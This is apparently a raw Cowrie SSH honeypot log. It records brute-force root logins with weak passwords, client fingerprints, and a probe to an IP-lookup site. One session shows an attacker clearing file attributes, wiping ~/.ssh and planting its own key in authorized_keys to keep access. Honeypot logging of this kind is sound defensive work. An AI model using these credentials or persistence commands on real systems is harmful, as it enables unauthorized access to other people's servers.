{"eventid":"cowrie.login.failed","username":"root","fingerprint":"0b:1d:a8:88:46:1a:a4:61:da:b2:3c:c0:2a:09:71:46","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCu6098r892+Qm1/Fi6D4BMjV487b+uGpnH4TnZp7Qr7NYQuxs7jiOPod32rBSTcfx2eXUcrOFVZSKZ6wMJtEKz9bRj2WxLZuMPJxi96mFHNbr7FE9QyxCAVqtu8aK6/8ZgLARp9m1KrK0U1yzJf/GqpVNF3RrnD7g0VDbcv9efCvhLXoGuM2wGGSB1GuOMrnqhdYyImCOTsXGm5CDIyiJvuPLDUVyhajYcewY51T6RukbjTv2DIb7b++hyyZTcGqZ9uWMoJpZuNuq8K+TIPHd7TF0EWJhhTt1a8dyOXXp147GN1RDT+nZRXQ+Ld+MjE5nGPILLcVsAGmT9Pw8UlI2b","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:45:15.930289Z","src_ip":"212.227.235.229","session":"ecc73a82f687"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"0b:1d:a8:88:46:1a:a4:61:da:b2:3c:c0:2a:09:71:46","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCu6098r892+Qm1/Fi6D4BMjV487b+uGpnH4TnZp7Qr7NYQuxs7jiOPod32rBSTcfx2eXUcrOFVZSKZ6wMJtEKz9bRj2WxLZuMPJxi96mFHNbr7FE9QyxCAVqtu8aK6/8ZgLARp9m1KrK0U1yzJf/GqpVNF3RrnD7g0VDbcv9efCvhLXoGuM2wGGSB1GuOMrnqhdYyImCOTsXGm5CDIyiJvuPLDUVyhajYcewY51T6RukbjTv2DIb7b++hyyZTcGqZ9uWMoJpZuNuq8K+TIPHd7TF0EWJhhTt1a8dyOXXp147GN1RDT+nZRXQ+Ld+MjE5nGPILLcVsAGmT9Pw8UlI2b","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 0b:1d:a8:88:46:1a:a4:61:da:b2:3c:c0:2a:09:71:46","sensor":"my-vps","timestamp":"2025-08-28T17:45:16.030291Z","src_ip":"212.227.235.229","session":"ecc73a82f687"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"0b:1d:a8:88:46:1a:a4:61:da:b2:3c:c0:2a:09:71:46","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCu6098r892+Qm1/Fi6D4BMjV487b+uGpnH4TnZp7Qr7NYQuxs7jiOPod32rBSTcfx2eXUcrOFVZSKZ6wMJtEKz9bRj2WxLZuMPJxi96mFHNbr7FE9QyxCAVqtu8aK6/8ZgLARp9m1KrK0U1yzJf/GqpVNF3RrnD7g0VDbcv9efCvhLXoGuM2wGGSB1GuOMrnqhdYyImCOTsXGm5CDIyiJvuPLDUVyhajYcewY51T6RukbjTv2DIb7b++hyyZTcGqZ9uWMoJpZuNuq8K+TIPHd7TF0EWJhhTt1a8dyOXXp147GN1RDT+nZRXQ+Ld+MjE5nGPILLcVsAGmT9Pw8UlI2b","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:45:16.031278Z","src_ip":"212.227.235.229","session":"ecc73a82f687"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:45:25.629237Z","src_ip":"212.227.235.229","session":"ecc73a82f687"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":49864,"dst_ip":"1.2.3.4","dst_port":22,"session":"a893937890eb","protocol":"ssh","message":"New connection: 171.243.150.220:49864 (1.2.3.4:22) [session: a893937890eb]","sensor":"my-vps","timestamp":"2025-08-28T17:45:57.924857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:45:58.009173Z","src_ip":"171.243.150.220","session":"a893937890eb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:45:58.170820Z","src_ip":"171.243.150.220","session":"a893937890eb"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:45:59.517446Z","src_ip":"171.243.150.220","session":"a893937890eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.220","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T17:45:59.748472Z","session":"a893937890eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:46:00.187824Z","src_ip":"171.243.150.220","session":"a893937890eb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:00.398859Z","src_ip":"171.243.150.220","session":"a893937890eb"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":41158,"dst_ip":"1.2.3.4","dst_port":22,"session":"db32445ad53c","protocol":"ssh","message":"New connection: 171.243.150.185:41158 (1.2.3.4:22) [session: db32445ad53c]","sensor":"my-vps","timestamp":"2025-08-28T17:46:06.474751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:46:06.516263Z","src_ip":"171.243.150.185","session":"db32445ad53c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:46:06.687646Z","src_ip":"171.243.150.185","session":"db32445ad53c"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":46844,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c870c4f484e","protocol":"ssh","message":"New connection: 199.195.253.95:46844 (1.2.3.4:22) [session: 2c870c4f484e]","sensor":"my-vps","timestamp":"2025-08-28T17:46:09.078460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:46:09.092787Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:46:09.240455Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.login.success","username":"root","password":"qwertyui","message":"login attempt [root/qwertyui] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:46:09.845661Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:46:10.162966Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.163761Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.164781Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.326849Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:46:10.660489Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.661226Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.779417Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.780265Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":47506,"dst_ip":"1.2.3.4","dst_port":22,"session":"077ddc4a2f33","protocol":"ssh","message":"New connection: 199.195.253.95:47506 (1.2.3.4:22) [session: 077ddc4a2f33]","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.884331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:46:10.890477Z","src_ip":"199.195.253.95","session":"077ddc4a2f33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:46:11.006539Z","src_ip":"199.195.253.95","session":"077ddc4a2f33"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T17:46:11.462572Z","src_ip":"199.195.253.95","session":"077ddc4a2f33"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:12.670947Z","src_ip":"199.195.253.95","session":"077ddc4a2f33"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":48210,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6d354de5805","protocol":"ssh","message":"New connection: 199.195.253.95:48210 (1.2.3.4:22) [session: d6d354de5805]","sensor":"my-vps","timestamp":"2025-08-28T17:46:12.845248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:46:12.849612Z","src_ip":"199.195.253.95","session":"d6d354de5805"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:46:13.055119Z","src_ip":"199.195.253.95","session":"d6d354de5805"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:46:13.854786Z","src_ip":"199.195.253.95","session":"d6d354de5805"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:14.059754Z","src_ip":"199.195.253.95","session":"2c870c4f484e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:14.060707Z","src_ip":"199.195.253.95","session":"d6d354de5805"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36872,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa2ad2892a20","protocol":"ssh","message":"New connection: 212.227.125.160:36872 (1.2.3.4:22) [session: fa2ad2892a20]","sensor":"my-vps","timestamp":"2025-08-28T17:46:16.786262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:46:16.787234Z","src_ip":"212.227.125.160","session":"fa2ad2892a20"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des